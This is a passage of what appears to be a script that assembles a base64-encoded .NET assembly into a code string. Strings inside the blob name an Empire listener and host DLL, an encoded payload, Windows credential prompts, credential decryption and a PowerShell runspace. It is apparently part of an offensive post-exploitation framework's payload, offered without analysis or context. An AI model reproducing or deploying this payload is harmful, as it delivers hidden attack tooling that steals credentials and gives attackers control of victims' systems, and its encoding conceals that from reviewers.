            code +="\"RW51bWVyYXRvcmAxAExpc3RgMQBNaWNyb3NvZnQuV2luMzIASW50MzIARGljdGlvbmFyeWAyAFJl\"+""\n"
            code +="\"YWRJbnQxNgBXcml0ZUludDE2ADxNb2R1bGU+AENSRURVSVdJTl9HRU5FUklDAEhhbmRsZUNvbnRy\"+""\n"
            code +="\"b2xDAENSRURVSV9GTEFHU19SRVFVSVJFX1NNQVJUQ0FSRABDUkVEVUlfRkxBR1NfSU5DT1JSRUNU\"+""\n"
            code +="\"X1BBU1NXT1JEAENSRURVSV9GTEFHU19WQUxJREFURV9VU0VSTkFNRQBDUkVEVUlfRkxBR1NfQ09N\"+""\n"
            code +="\"UExFVEVfVVNFUk5BTUUAQ1JFRFVJX0ZMQUdTX0tFRVBfVVNFUk5BTUUAQ1JFRFVJX0ZMQUdTX1JF\"+""\n"
            code +="\"UVVJUkVfQ0VSVElGSUNBVEUAQ1JFRFVJX01BWF9QQVNTV09SRF9MRU5HVEgAQ1JFRFVJX01BWF9N\"+""\n"
            code +="\"RVNTQUdFX0xFTkdUSABDUkVEX01BWF9VU0VSTkFNRV9MRU5HVEgAQ1JFRFVJX01BWF9VU0VSTkFN\"+""\n"
            code +="\"RV9MRU5HVEgAQ1JFRFVJX01BWF9DQVBUSU9OX0xFTkdUSABDUkVEVUlfRkxBR1NfQUxXQVlTX1NI\"+""\n"
            code +="\"T1dfVUkAZ2V0X1VJAENyZWRlbnRpYWxVSQBnZXRfUmF3VUkAQ1JFRFVJX0ZMQUdTX1BBU1NXT1JE\"+""\n"
            code +="\"X09OTFlfT0sAQ1JFRFVJX0ZMQUdTX1NFUlZFUl9DUkVERU5USUFMAENSRURVSV9GTEFHU19FWFBF\"+""\n"
            code +="\"Q1RfQ09ORklSTUFUSU9OAENSRURVSV9JTkZPAFN5c3RlbS5JTwBDUkVEVUlXSU5fRU5VTUVSQVRF\"+""\n"
            code +="\"X0NVUlJFTlRfVVNFUgBDUkVEVUlfRkxBR1NfUkVRVUVTVF9BRE1JTklTVFJBVE9SAENSRURVSV9G\"+""\n"
            code +="\"TEFHU19FWENMVURFX0NFUlRJRklDQVRFUwBDUkVEVUlfRkxBR1NfR0VORVJJQ19DUkVERU5USUFM\"+""\n"
            code +="\"UwBDUkVEVUlfRkxBR1NfVVNFUk5BTUVfVEFSR0VUX0NSRURFTlRJQUxTAENSRURVSVdJTl9FTlVN\"+""\n"
            code +="\"RVJBVEVfQURNSU5TAENSRURVSVdJTl9TRUNVUkVfUFJPTVBUAENSRURVSV9GTEFHU19QRVJTSVNU\"+""\n"
            code +="\"AENSRURVSV9GTEFHU19ET19OT1RfUEVSU0lTVABDUkVEVUlXSU5fUEFDS18zMl9XT1cAQ1JFRFVJ\"+""\n"
            code +="\"V0lOX0NIRUNLQk9YAENSRURVSV9GTEFHU19TSE9XX1NBVkVfQ0hFQ0tfQk9YAGdldF9YAENSRURV\"+""\n"
            code +="\"SVdJTl9JTl9DUkVEX09OTFkAQ1JFRFVJV0lOX0FVVEhQQUNLQUdFX09OTFkAZ2V0X1kAdmFsdWVf\"+""\n"
            code +="\"XwBtc2NvcmxpYgBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBzcmMAZ2V0X0luc3RhbmNlSWQA\"+""\n"
            code +="\"aW5zdGFuY2VJZABzb3VyY2VJZABzaGVsbElkAGdldF9DdXJyZW50VGhyZWFkAEVuY29kZWRQYXls\"+""\n"
            code +="\"b2FkAEFkZABnZXRfSXNSdW5zcGFjZVB1c2hlZABnZXRfSXNTYXZlQ2hlY2tlZABzZXRfSXNTYXZl\"+""\n"
            code +="\"Q2hlY2tlZABDYW5jZWxsZWQAUmVzZXJ2ZWQATmV3R3VpZAA8SXNTYXZlQ2hlY2tlZD5rX19CYWNr\"+""\n"
            code +="\"aW5nRmllbGQAPFBhc3N3b3JkPmtfX0JhY2tpbmdGaWVsZAA8QXV0aEVycm9yQ29kZT5rX19CYWNr\"+""\n"
            code +="\"aW5nRmllbGQAPERvbWFpbk5hbWU+a19fQmFja2luZ0ZpZWxkADxVc2VyTmFtZT5rX19CYWNraW5n\"+""\n"
            code +="\"RmllbGQAPFRhcmdldE5hbWU+a19fQmFja2luZ0ZpZWxkADxIYm1CYW5uZXI+a19fQmFja2luZ0Zp\"+""\n"
            code +="\"ZWxkADxGbGFncz5rX19CYWNraW5nRmllbGQAPEh3bmRQYXJlbnQ+a19fQmFja2luZ0ZpZWxkAGNt\"+""\n"
            code +="\"ZABQU0NvbW1hbmQAQWRkQ29tbWFuZABBcHBlbmQAZ2V0X0Vycm9yUmVjb3JkAElDb250YWluc0Vy\"+""\n"
            code +="\"cm9yUmVjb3JkAFByb2dyZXNzUmVjb3JkAHJlY29yZABnZXRfUGFzc3dvcmQAc2V0X1Bhc3N3b3Jk\"+""\n"
            code +="\"AHBjY2hNYXhQYXNzd29yZABwc3pQYXNzd29yZABwYXNzd29yZABQU0hvc3RVc2VySW50ZXJmYWNl\"+""\n"
            code +="\"AE15SG9zdFVzZXJJbnRlcmZhY2UAbXlIb3N0VXNlckludGVyZmFjZQBQU0hvc3RSYXdVc2VySW50\"+""\n"
            code +="\"ZXJmYWNlAE15UmF3VXNlckludGVyZmFjZQBteVJ1blNwYWNlAGdldF9SdW5zcGFjZQBzZXRfUnVu\"+""\n"
            code +="\"c3BhY2UAcHVzaGVkUnVuc3BhY2UAQ3JlYXRlUnVuc3BhY2UAUHVzaFJ1bnNwYWNlAFBvcFJ1bnNw\"+""\n"
            code +="\"YWNlAHJ1bnNwYWNlAFByb21wdEZvckNob2ljZQBkZWZhdWx0Q2hvaWNlAHNvdXJjZQBDcmVkVUlQ\"+""\n"
            code +="\"cm9tcHRSZXR1cm5Db2RlAGdldF9BdXRoRXJyb3JDb2RlAHNldF9BdXRoRXJyb3JDb2RlAGdldF9F\"+""\n"
            code +="\"eGl0Q29kZQBzZXRfRXhpdENvZGUAZXhpdENvZGUAZ2V0X1VuaWNvZGUAWmVyb0ZyZWVDb1Rhc2tN\"+""\n"
            code +="\"ZW1Vbmljb2RlAFNlY3VyZVN0cmluZ1RvQ29UYXNrTWVtVW5pY29kZQBDb1Rhc2tNZW1GcmVlAHB1\"+""\n"
            code +="\"bEF1dGhQYWNrYWdlAGF1dGhQYWNrYWdlAGdldF9NZXNzYWdlAHNldF9NZXNzYWdlAF9tZXNzYWdl\"+""\n"
            code +="\"AEludm9rZQBnZXRfS2V5QXZhaWxhYmxlAElFbnVtZXJhYmxlAElEaXNwb3NhYmxlAFJ1bnRpbWVU\"+""\n"
            code +="\"eXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFJlY3RhbmdsZQByZWN0YW5nbGUARmlsZQBHZXRE\"+""\n"
            code +="\"b2xsYXJQcm9maWxlAHVzZVRlc3RQcm9maWxlAEVtcGlyZUxpc3RlbmVyQ29uc29sZQBnZXRfVGl0\"+""\n"
            code +="\"bGUAc2V0X1RpdGxlAGdldF9XaW5kb3dUaXRsZQBzZXRfV2luZG93VGl0bGUAZ2V0X05hbWUAR2V0\"+""\n"
            code +="\"RnVsbFByb2ZpbGVGaWxlTmFtZQBnZXRfRG9tYWluTmFtZQBzZXRfRG9tYWluTmFtZQBnZXRfVXNl\"+""\n"
            code +="\"ckRvbWFpbk5hbWUAcHN6RG9tYWluTmFtZQBnZXRfVXNlck5hbWUAc2V0X1VzZXJOYW1lAHBjY2hN\"+""\n"
            code +="\"YXhVc2VyTmFtZQBwc3pVc2VyTmFtZQB1c2VyTmFtZQBnZXRfVGFyZ2V0TmFtZQBzZXRfVGFyZ2V0\"+""\n"
            code +="\"TmFtZQBwc3pUYXJnZXROYW1lAHRhcmdldE5hbWUAR2V0RGlyZWN0b3J5TmFtZQBwY2NoTWF4RG9t\"+""\n"
            code +="\"YWluYW1lAFJlYWRMaW5lAFdyaXRlVmVyYm9zZUxpbmUAV3JpdGVMaW5lAFdyaXRlV2FybmluZ0xp\"+""\n"
            code +="\"bmUAV3JpdGVEZWJ1Z0xpbmUAV3JpdGVFcnJvckxpbmUAQ29tYmluZQBMb2NhbE1hY2hpbmUAVmFs\"+""\n"
            code +="\"dWVUeXBlAG5vdFVzZWRIZXJlAFN5c3RlbS5Db3JlAGdldF9DdXJyZW50VUlDdWx0dXJlAGdldF9D\"+""\n"
            code +="\"dXJyZW50Q3VsdHVyZQBQb3dlclNoZWxsRW5naW5lQXBwbGljYXRpb25CYXNlAEdldEFwcGxpY2F0\"+""\n"
            code +="\"aW9uQmFzZQBEaXNwb3NlAENyZWF0ZQBnZXRfU3RhdGUASW5pdGlhbFNlc3Npb25TdGF0ZQBQU0lu\"+""\n"
            code +="\"dm9jYXRpb25TdGF0ZQBDb21wbGV0ZQBXcml0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBH\"+""\n"
            code +="\"dWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3Nl\"+""\n"
            code +="\"bWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEV4dGVuc2lvbkF0\"+""\n"
            code +="\"dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlv\"+""\n"
            code +="\"bkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENv\"+""\n"
            code +="\"bXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFz\"+""\n"
            code +="\"c2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1l\"+""\n"
            code +="\"Q29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBFeGVjdXRlAEdldFZhbHVlAHZhbHVlAHBmU2F2ZQBSZW1v\"+""\n"
            code +="\"dmUAY2JTaXplAGdldF9CdWZmZXJTaXplAHNldF9CdWZmZXJTaXplAHVsSW5BdXRoQnVmZmVyU2l6\"+""\n"
            code +="\"ZQByZWZPdXRBdXRoQnVmZmVyU2l6ZQBwdWxPdXRBdXRoQnVmZmVyU2l6ZQBhdXRoQnVmZmVyU2l6\"+""\n"
            code +="\"ZQBTZXRCdWZmZXJTaXplAGdldF9DdXJzb3JTaXplAHNldF9DdXJzb3JTaXplAGdldF9XaW5kb3dT\"+""\n"
            code +="\"aXplAHNldF9XaW5kb3dTaXplAGdldF9NYXhQaHlzaWNhbFdpbmRvd1NpemUAU2V0V2luZG93U2l6\"+""\n"
            code +="\"ZQBnZXRfTWF4V2luZG93U2l6ZQBTaXplT2YAUHJvbXB0Rm9yQ3JlZGVudGlhbHNGbGFnAFByb21w\"+""\n"
            code +="\"dEZvcldpbmRvd3NDcmVkZW50aWFsc0ZsYWcAU3lzdGVtLlRocmVhZGluZwBFbmNvZGluZwBGcm9t\"+""\n"
            code +="\"QmFzZTY0U3RyaW5nAFByb21wdEZvckNyZWRlbnRpYWxzV2l0aFNlY3VyZVN0cmluZwBQcm9tcHRG\"+""\n"
            code +="\"b3JXaW5kb3dzQ3JlZGVudGlhbHNXaXRoU2VjdXJlU3RyaW5nAFByb21wdFdpdGhTZWN1cmVTdHJp\"+""\n"
            code +="\"bmcAUHRyVG9TZWN1cmVTdHJpbmcAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcFNl\"+""\n"
            code +="\"Y3VyZVN0cmluZwBSZWFkTGluZUFzU2VjdXJlU3RyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBTdWJz\"+""\n"
            code +="\"dHJpbmcARm9yRWFjaABHZXRBbGxVc2Vyc0ZvbGRlclBhdGgAR2V0Rm9sZGVyUGF0aABQb3dlclNo\"+""\n"
            code +="\"ZWxsUm9vdEtleVBhdGgAZ2V0X1dpZHRoAGdldF9CdWZmZXJXaWR0aABnZXRfV2luZG93V2lkdGgA\"+""\n"
            code +="\"Z2V0X0xhcmdlc3RXaW5kb3dXaWR0aABnZXRfTGVuZ3RoAGxlbmd0aABteVJhd1VpAFB0clRvU3Ry\"+""\n"
            code +="\"aW5nVW5pAGluc3RhbmNlTG9jawBNYXJzaGFsAFBTQ3JlZGVudGlhbABQcm9tcHRGb3JDcmVkZW50\"+""\n"
            code +="\"aWFsAFByb21wdEZvckNyZWRlbnRpYWxzSW50ZXJuYWwAUHJvbXB0Rm9yV2luZG93c0NyZWRlbnRp\"+""\n"
            code +="\"YWxzSW50ZXJuYWwAZ2V0X0xhYmVsAEdldEhvdGtleUFuZExhYmVsAHNldF9DYW5jZWwAU3lzdGVt\"+""\n"
            code +="\"LkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsAFN5c3RlbS5Db21wb25lbnRNb2RlbABvbGUzMi5kbGwA\"+""\n"
            code +="\"Y3JlZHVpLmRsbABFbXBpcmVIb3N0LmRsbABCdWZmZXJDZWxsAGN1cnJlbnRQb3dlclNoZWxsAGZp\"+""\n"
            code +="\"bGwAcHJvZ3JhbQBSZUFsbG9jQ29UYXNrTWVtAGdldF9JdGVtAHNldF9JdGVtAE9wZXJhdGluZ1N5\"+""\n"
            code +="\"c3RlbQBUcmltAEVudW0AT3BlbgBvcmlnaW4AZ2V0X09TVmVyc2lvbgBnZXRfVmVyc2lvbgBJSG9z\"+""\n"
            code +="\"dFN1cHBvcnRzSW50ZXJhY3RpdmVTZXNzaW9uAE5vdGlmeUVuZEFwcGxpY2F0aW9uAE5vdGlmeUJl\"+""\n"
            code +="\"Z2luQXBwbGljYXRpb24AZ2V0X0xvY2F0aW9uAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24A\"+""\n"
            code +="\"ZGVzdGluYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ASUhvc3RVSVN1cHBvcnRzTXVsdGlwbGVD\"+""\n"
            code +="\"aG9pY2VTZWxlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AQ29tbWFuZENvbGxlY3Rpb24AZ2V0X0N1\"+""\n"
            code +="\"cnNvclBvc2l0aW9uAHNldF9DdXJzb3JQb3NpdGlvbgBnZXRfV2luZG93UG9zaXRpb24Ac2V0X1dp\"+""\n"
            code +="\"bmRvd1Bvc2l0aW9uAFNldFdpbmRvd1Bvc2l0aW9uAGdldF9DYXB0aW9uAHNldF9DYXB0aW9uAF9j\"+""\n"
            code +="\"YXB0aW9uAFdpbjMyRXhjZXB0aW9uAE5vdEltcGxlbWVudGVkRXhjZXB0aW9uAEFyZ3VtZW50T3V0\"+""\n"
            code +="\"T2ZSYW5nZUV4Y2VwdGlvbgBSdW50aW1lRXhjZXB0aW9uAEFyZ3VtZW50TnVsbEV4Y2VwdGlvbgBS\"+""\n"
            code +="\"ZXBvcnRFeGNlcHRpb24AU2VjdXJpdHlFeGNlcHRpb24ARmllbGREZXNjcmlwdGlvbgBDaG9pY2VE\"+""\n"
            code +="\"ZXNjcmlwdGlvbgBvcmlnaW5hbFVJQ3VsdHVyZUluZm8Ab3JpZ2luYWxDdWx0dXJlSW5mbwBQU0lu\"+""\n"
            code +="\"dm9jYXRpb25TdGF0ZUluZm8AZ2V0X0ludm9jYXRpb25TdGF0ZUluZm8AcFVpSW5mbwBLZXlJbmZv\"+""\n"
            code +="\"AFBTUHJvcGVydHlJbmZvAFplcm8AQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcABj\"+""\n"
            code +="\"bGlwAGdldF9XaW5kb3dUb3AAU3RvcABTeXN0ZW0uTGlucQBBcHBlbmRDaGFyAElGb3JtYXRQcm92\"+""\n"
            code +="\"aWRlcgBTdHJpbmdCdWlsZGVyAFNwZWNpYWxGb2xkZXIAc2VuZGVyAGNiQXV0aEJ1ZmZlcgBwdklu\"+""\n"
            code +="\"QXV0aEJ1ZmZlcgBwQXV0aEJ1ZmZlcgByZWZPdXRBdXRoQnVmZmVyAHBwdk91dEF1dGhCdWZmZXIA\"+""\n"
            code +="\"Q3JlZFBhY2tBdXRoZW50aWNhdGlvbkJ1ZmZlcgBDcmVkVW5QYWNrQXV0aGVudGljYXRpb25CdWZm\"+""\n"
            code +="\"ZXIARmx1c2hJbnB1dEJ1ZmZlcgBzZXRfQXV0aG9yaXphdGlvbk1hbmFnZXIARXhlY3V0ZVN0YWdl\"+""\n"
            code +="\"cgBFbXBpcmVMaXN0ZW5lcgBnZXRfSGJtQmFubmVyAHNldF9IYm1CYW5uZXIAaGJtQmFubmVyAGV4\"+""\n"
            code +="\"ZWN1dGVIZWxwZXIAVG9VcHBlcgBmb3JDdXJyZW50VXNlcgBBZGRQYXJhbWV0ZXIASW52YWxpZFBh\"+""\n"
            code +="\"cmFtZXRlcgBFbnRlcgBnZXRfTWFqb3IAZ2V0X0ZvcmVncm91bmRDb2xvcgBzZXRfRm9yZWdyb3Vu\"+""\n"
            code +="\"ZENvbG9yAGZvcmVncm91bmRDb2xvcgBnZXRfQmFja2dyb3VuZENvbG9yAHNldF9CYWNrZ3JvdW5k\"+""\n"
            code +="\"Q29sb3IAYmFja2dyb3VuZENvbG9yAENvbnNvbGVDb2xvcgBHZXRMYXN0V2luMzJFcnJvcgBkd0F1\"+""\n"
            code +="\"dGhFcnJvcgBhdXRoRXJyb3IASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgAuY2N0b3IA\"+""\n"
            code +="\"TW9uaXRvcgBhdXRoQnVmZmVyUHRyAEludFB0cgBwdHIAU3lzdGVtLkRpYWdub3N0aWNzAGdldF9D\"+""\n"
            code +="\"b21tYW5kcwBzZXRfQ29tbWFuZHMAR2V0UHJvZmlsZUNvbW1hbmRzAE5hdGl2ZU1ldGhvZHMARXh0\"+""\n"
            code +="\"ZW5zaW9uTWV0aG9kcwBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcwBkZWZh\"+""\n"
            code +="\"dWx0Q2hvaWNlcwBjaG9pY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u\"+""\n"
            code +="\"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEhvc3RVdGlsaXRpZXMAZ2V0\"+""\n"
            code +="\"X1Byb3BlcnRpZXMAUFNDcmVkZW50aWFsVHlwZXMAYWxsb3dlZENyZWRlbnRpYWxUeXBlcwBQaXBl\"+""\n"
            code +="\"bGluZVJlc3VsdFR5cGVzAENvb3JkaW5hdGVzAGdldF9GbGFncwBzZXRfRmxhZ3MASW52YWxpZEZs\"+""\n"
            code +="\"YWdzAGR3RmxhZ3MAZmxhZ3MAQ29uc29sZUNhbmNlbEV2ZW50QXJncwBwY2JQYWNrZWRDcmVkZW50\"+""\n"
            code +="\"aWFscwBwUGFja2VkQ3JlZGVudGlhbHMAZGVjcnlwdFByb3RlY3RlZENyZWRlbnRpYWxzAENyZWRV\"+""\n"
            code +="\"SVByb21wdEZvckNyZWRlbnRpYWxzAENyZWRVSVByb21wdEZvcldpbmRvd3NDcmVkZW50aWFscwBC\"+""\n"
            code +="\"dWlsZEhvdGtleXNBbmRQbGFpbkxhYmVscwBTeXN0ZW0uQ29sbGVjdGlvbnMAUFNDcmVkZW50aWFs\"+""\n"
            code +="\"VUlPcHRpb25zAFNjb3BlZEl0ZW1PcHRpb25zAFByb21wdEZvckNyZWRlbnRpYWxzT3B0aW9ucwBQ\"+""\n"
            code +="\"cm9tcHRGb3JXaW5kb3dzQ3JlZGVudGlhbHNPcHRpb25zAFJlYWRLZXlPcHRpb25zAGRlc2NyaXB0\"+""\n"
            code +="\"aW9ucwBvcHRpb25zAGdldF9DaGFycwB1bFBhc3N3b3JkTWF4Q2hhcnMAdWxVc2VyTmFtZU1heENo\"+""\n"
            code +="\"YXJzAFN1Y2Nlc3MAV3JpdGVQcm9ncmVzcwBNZXJnZU15UmVzdWx0cwBTY3JvbGxCdWZmZXJDb250\"+""\n"
            code +="\"ZW50cwBHZXRCdWZmZXJDb250ZW50cwBTZXRCdWZmZXJDb250ZW50cwBjb250ZW50cwBFeGlzdHMA\"+""\n"
            code +="\"Y3VycmVudFVzZXJBbGxIb3N0cwBhbGxVc2Vyc0FsbEhvc3RzAENvbmNhdABBcHBlbmRGb3JtYXQA\"+""\n"
            code +="\"QXNQU09iamVjdABnZXRfQmFzZU9iamVjdABHZXQAU2V0AGdldF9XaW5kb3dMZWZ0AGdldF9IZWln\"+""\n"
            code +="\"aHQAZ2V0X0J1ZmZlckhlaWdodABnZXRfV2luZG93SGVpZ2h0AGdldF9MYXJnZXN0V2luZG93SGVp\"+""\n"
            code +="\"Z2h0AFNwbGl0AGdldF9TaG91bGRFeGl0AHNldF9TaG91bGRFeGl0AFNldFNob3VsZEV4aXQAc2hv\"+""\n"
            code +="\"dWxkRXhpdABDcmVhdGVEZWZhdWx0AFByb21wdENyZWRlbnRpYWxzU2VjdXJlU3RyaW5nUmVzdWx0\"+""\n"
            code +="\"AElQcm9tcHRDcmVkZW50aWFsc1Jlc3VsdAByZXN1bHQARW52aXJvbm1lbnQAZ2V0X0h3bmRQYXJl\"+""\n"
            code +="\"bnQAc2V0X0h3bmRQYXJlbnQAaHduZFBhcmVudABnZXRfQ3VycmVudABnZXRfQ291bnQAQWRkU2Ny\"+""\n"
            code +="\"aXB0AEVudGVyTmVzdGVkUHJvbXB0AEV4aXROZXN0ZWRQcm9tcHQAQ29udmVydABUb0xpc3QAU3lz\"+""\n"
            code +="\"dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0AFBTSG9zdABFbXBpcmVIb3N0AGN1cnJlbnRV\"+""\n"
            code +="\"c2VyQ3VycmVudEhvc3QAYWxsVXNlcnNDdXJyZW50SG9zdABNeUhvc3QAbXlIb3N0AGlucHV0AE1v\"+""\n"
            code +="\"dmVOZXh0AFN5c3RlbS5UZXh0AHBzek1lc3NhZ2VUZXh0AHBzekNhcHRpb25UZXh0AFRvQXJyYXkA\"+""\n"
            code +="\"VG9DaGFyQXJyYXkAT3BlblN1YktleQBSZWFkS2V5AFBvd2VyU2hlbGxFbmdpbmVLZXkAUmVnaXN0\"+""\n"
            code +="\"cnlWZXJzaW9uS2V5AFJlZ2lzdHJ5S2V5AEdldEFzc2VtYmx5AEdldEVudHJ5QXNzZW1ibHkATWFr\"+""\n"
            code +="\"ZVJlYWRPbmx5AEVycm9yQ2F0ZWdvcnkAUnVuc3BhY2VGYWN0b3J5AFJlZ2lzdHJ5AGdldF9DYXBh\"+""\n"
            code +="\"Y2l0eQBzZXRfQ2FwYWNpdHkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBTeXN0ZW0uU2VjdXJp\"+""\n"
            code +="\"dHkASXNOdWxsT3JFbXB0eQBQU05vdGVQcm9wZXJ0eQAAAAtEAHUAbQBtAHkAABVQAG8AdwBlAHIA\"+""\n"
            code +="\"UwBoAGUAbABsAAAXbwB1AHQALQBkAGUAZgBhAHUAbAB0AAEpSABvAHMAdAAuAFIAZQBwAG8AcgB0\"+""\n"
            code +="\"AEUAeABjAGUAcAB0AGkAbwBuAAANJABpAG4AcAB1AHQAABVvAHUAdAAtAHMAdAByAGkAbgBnAAEN\"+""\n"
            code +="\"RQBtAHAAaQByAGUAAIClQwBhAG4AbgBvAHQAIABzAHUAcwBwAGUAbgBkACAAdABoAGUAIABzAGgA\"+""\n"
            code +="\"ZQBsAGwALAAgAEUAbgB0AGUAcgBOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABtAGUAdABo\"+""\n"
            code +="\"AG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AEgA\"+""\n"
            code +="\"bwBzAHQALgAAd1QAaABlACAARQB4AGkAdABOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABt\"+""\n"
            code +="\"AGUAdABoAG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAA\"+""\n"
            code +="\"TQB5AEgAbwBzAHQALgAAAwoAAAMgAAAVfAB7ADAAfQA+ACAAewAxAH0AIAAAI1sARABlAGYAYQB1\"+""\n"
            code +="\"AGwAdAAgAGkAcwAgACgAewAwAH0AXQAAIUkAbgB2AGEAbABpAGQAIABjAGgAbwBpAGMAZQA6ACAA\"+""\n"
            code +="\"ACtbAEQAZQBmAGEAdQBsAHQAIABjAGgAbwBpAGMAZQBzACAAYQByAGUAIAAAJ1sARABlAGYAYQB1\"+""\n"
            code +="\"AGwAdAAgAGMAaABvAGkAYwBlACAAaQBzACAAAA0iAHsAMAB9ACIALAAAA10AABlDAGgAbwBpAGMA\"+""\n"
            code +="\"ZQBbAHsAMAB9AF0AOgAAFUQARQBCAFUARwA6ACAAewAwAH0AABlWAEUAUgBCAE8AUwBFADoAIAB7\"+""\n"
            code +="\"ADAAfQAAGVcAQQBSAE4ASQBOAEcAOgAgAHsAMAB9AAAhQQBsAGwAVQBzAGUAcgBzAEEAbABsAEgA\"+""\n"
            code +="\"bwBzAHQAcwAAJ0EAbABsAFUAcwBlAHIAcwBDAHUAcgByAGUAbgB0AEgAbwBzAHQAACdDAHUAcgBy\"+""\n"
            code +="\"AGUAbgB0AFUAcwBlAHIAQQBsAGwASABvAHMAdABzAAAtQwB1AHIAcgBlAG4AdABVAHMAZQByAEMA\"+""\n"
            code +="\"dQByAHIAZQBuAHQASABvAHMAdAAAGXMAZQB0AC0AdgBhAHIAaQBhAGIAbABlAAEJTgBhAG0AZQAA\"+""\n"
            code +="\"D3AAcgBvAGYAaQBsAGUAAAtWAGEAbAB1AGUAAA1PAHAAdABpAG8AbgAAI1cAaQBuAGQAbwB3AHMA\"+""\n"
            code +="\"UABvAHcAZQByAFMAaABlAGwAbAAAF3AAcgBvAGYAaQBsAGUALgBwAHMAMQAAIXAAcgBvAGYAaQBs\"+""\n"
            code +="\"AGUAXwB0AGUAcwB0AC4AcABzADEAAANfAABhUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMA\"+""\n"
            code +="\"bwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFAAbwB3AGUAcgBTAGgAZQBsAGwARQBu\"+""\n"
            code +="\"AGcAaQBuAGUAAB9BAHAAcABsAGkAYwBhAHQAaQBvAG4AQgBhAHMAZQAAgItUAGgAZQAgAEMAdQBy\"+""\n"
            code +="\"AHMAbwByAFAAbwBzAGkAdABpAG8AbgAgAHAAcgBvAHAAZQByAHQAeQAgAGkAcwAgAG4AbwB0ACAA\"+""\n"
            code +="\"aQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AFIAYQB3AFUAcwBlAHIASQBuAHQAZQBy\"+""\n"
            code +="\"AGYAYQBjAGUALgAAgI1UAGgAZQAgAEcAZQB0AEIAdQBmAGYAZQByAEMAbwBuAHQAZQBuAHQAcwAg\"+""\n"
            code +="\"AG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkA\"+""\n"
            code +="\"IABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAAB9VABoAGUAIABSAGUAYQBk\"+""\n"
            code +="\"AEsAZQB5ACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4A\"+""\n"
            code +="\"dABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAl1QA\"+""\n"
            code +="\"aABlACAAUwBjAHIAbwBsAGwAQgB1AGYAZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0\"+""\n"
            code +="\"AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkA\"+""\n"
            code +="\"UgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAkVQAaABlACAAUwBlAHQAQgB1AGYA\"+""\n"
            code +="\"ZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABp\"+""\n"
            code +="\"AG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIA\"+""\n"
            code +="\"ZgBhAGMAZQAuAAAPbwBwAHQAaQBvAG4AcwAAEXUAcwBlAHIATgBhAG0AZQAANUMAUgBFAEQAVQBJ\"+""\n"
            code +="\"AF8ATQBBAFgAXwBVAFMARQBSAE4AQQBNAEUAXwBMAEUATgBHAFQASAAAEXAAYQBzAHMAdwBvAHIA\"+""\n"
            code +="\"ZAAANUMAUgBFAEQAVQBJAF8ATQBBAFgAXwBQAEEAUwBTAFcATwBSAEQAXwBMAEUATgBHAFQASAAA\"+""\n"
            code +="\"C3YAYQBsAHUAZQAAD2MAYQBwAHQAaQBvAG4AAA9tAGUAcwBzAGEAZwBlAACjYeiU2ONRRKeNL06S\"+""\n"
            code +="\"sHvIAAMgAAEEIAEBCAUgAQERFQQgAQEOBCABAQIDBwEOBQAAEoD5BQABHQUOBSABDh0FCwcFEk0c\"+""\n"
